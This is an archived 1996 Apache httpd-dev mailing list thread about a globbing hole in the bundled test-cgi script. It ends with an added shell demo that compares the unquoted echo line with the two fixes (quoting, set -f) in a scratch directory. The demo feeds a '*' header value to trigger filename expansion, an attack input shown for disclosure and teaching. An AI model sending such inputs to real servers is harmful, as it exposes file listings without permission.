httpd-dev mailing list archives

From Brian Behlendorf <br...@organic.com>
Subject Re: Vulnerability in test-cgi
Date Mon, 09 Dec 1996 03:53:51 GMT

We put a set -f in the script; it'll be a part of 1.2b2.  The other script is a
Perl script which does not have these problems.  Thanks for the note!

	Brian

On Fri, 6 Dec 1996, Rob Hartill wrote:
> M Shariful Anam wrote:
> 
> >Hi,
> >
> >The test-cgi that is supplied with Apache (1.0.5, 1.1.1 and 1.2b I've
> >checked) has a security hole. It works on Linux, SunOS, Digital UNIX (and
> >should work on all UNIX). Most people install it without actually
> >understanding the possibilities.
> >
> >Attached is an exploit script. It is based on the fact that passing a 
> >parameter of "*" to the test-cgi will cause filename globbing and give 
> >that to the remote accessor.
> >
> >The solution is to change the following in test-cgi:
> >echo CONTENT_TYPE = $CONTENT_TYPE
> >to
> >echo CONTENT_TYPE = "$CONTENT_TYPE"
> >
> >or better yet, put a
> >set -f
> >at the top of the script.
> >
> >Thank you.
> >
> >---
> > M Shariful Anam                              <shuman@kaifnet.com>
> >
> >                Kaifnet Services -- Bangladesh
> >
> 
> 
> -- 
> Rob Hartill.       Internet Movie Database Ltd.    http://www.imdb.com/  
> 

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--
brian@organic.com  www.apache.org  hyperreal.com  http://www.organic.com/JOBS
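
The two fixes discussed in this thread, side by side, as an added example that is not part of the original messages or of the Apache distribution. The function names, the scratch directory and its file names are constructed for the demonstration; only the echo line comes from the report.

```shell
#!/bin/sh
# Added illustration: the unquoted echo line from test-cgi next to the
# two fixes named in the thread. DEMO_DIR and its files are constructed.

DEMO_DIR=$(mktemp -d)
trap 'rm -rf "$DEMO_DIR"' EXIT
touch "$DEMO_DIR/access.conf" "$DEMO_DIR/httpd.conf" "$DEMO_DIR/srm.conf"

# As shipped: the expansion is unquoted, so the shell applies field
# splitting and pathname expansion to the client-supplied value.
echo_unquoted() {
    ( cd "$DEMO_DIR" && CONTENT_TYPE="$1" && echo CONTENT_TYPE = $CONTENT_TYPE )
}

# Fix 1: quote the expansion. The value is passed to echo as one word,
# with no splitting and no globbing, but only on lines that are quoted.
echo_quoted() {
    ( cd "$DEMO_DIR" && CONTENT_TYPE="$1" && echo CONTENT_TYPE = "$CONTENT_TYPE" )
}

# Fix 2 (the one applied for 1.2b2): set -f turns pathname expansion off
# for the whole script. Field splitting still happens on unquoted values.
echo_noglob() {
    ( cd "$DEMO_DIR" && set -f && CONTENT_TYPE="$1" && echo CONTENT_TYPE = $CONTENT_TYPE )
}

# Constructed sample header values: a normal one, a glob pattern, and
# one with repeated spaces to show the remaining splitting under set -f.
for value in 'text/plain' '*' 'text/plain;   charset=x'; do
    echo "--- header value: [$value]"
    printf 'unquoted: '; echo_unquoted "$value"
    printf 'quoted:   '; echo_quoted "$value"
    printf 'set -f:   '; echo_noglob "$value"
done
```

With `set -f` alone the value is still split on whitespace before echo sees it, so quoting every expansion as well gives the most faithful output.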

